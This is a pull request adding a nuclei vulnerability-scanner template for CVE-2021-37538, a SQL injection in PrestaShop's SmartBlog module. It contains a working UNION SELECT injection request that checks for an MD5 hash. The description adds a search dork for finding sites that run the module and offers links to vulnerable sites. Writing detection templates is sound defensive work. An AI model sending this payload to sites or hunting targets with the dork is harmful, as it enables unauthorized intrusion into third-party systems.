### PR TITLE
Create CVE-2021-37538.yaml

### DIFF
--- a/cves/2021/CVE-2021-37538.yaml
+++ b/cves/2021/CVE-2021-37538.yaml
@@ -5,16 +5,15 @@ info:
   author: whoever
   severity: high
   description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
-  tags: cve,cve2021,prestashop,smartblog,smartdatasoft,sqli
+  tags: cve,cve2021,prestashop,smartblog,sqli
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
     - https://blog.sorcery.ie/posts/smartblog_sqli/
 
 requests:
-  - raw:
-      - |
-        GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"
 
     matchers-condition: and
     matchers:

--- a/cves/2021/CVE-2021-37538.yaml
+++ b/cves/2021/CVE-2021-37538.yaml
@@ -1,0 +1,28 @@
+id: CVE-2021-37538
+
+info:
+  name: PrestaShop SmartBlog SQL Injection
+  author: whoever
+  severity: high
+  description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
+  tags: cve,cve2021,prestashop,smartblog,smartdatasoft,sqli
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
+    - https://blog.sorcery.ie/posts/smartblog_sqli/
+
+requests:
+  - raw:
+      - |
+        GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "c5fe25896e49ddfe996db7508cf00534"
+        part: body


### PR DESCRIPTION
### Template / PR Information

A more straight-forward template this time due to the `UNION SELECT` technique being usable.
It sends a raw request for the same reason explained in my [PR for CVE-2021-36748](https://github.com/projectdiscovery/nuclei-templates/pull/2446). The same researcher found a SQL injection in yet another blog module for PrestaShop: SmartBlog by SmartDataSoft. CVE entry is yet to be published.

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

#### Additional Details (leave it blank if not applicable)

Dork for source code search engines: `"/modules/smartblog/css/smartblogstyle.css" "prestashop"`
There don't seem to be as much vulnerable sites or at least the vulnerable/not vulnerable ratio is rather low. Feel free to hit me up for a vulnerable link to save you some time.

### Additional References:

- [CVE-2021-37538](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538)
- [Writeup by researcher](https://blog.sorcery.ie/posts/smartblog_sqli/)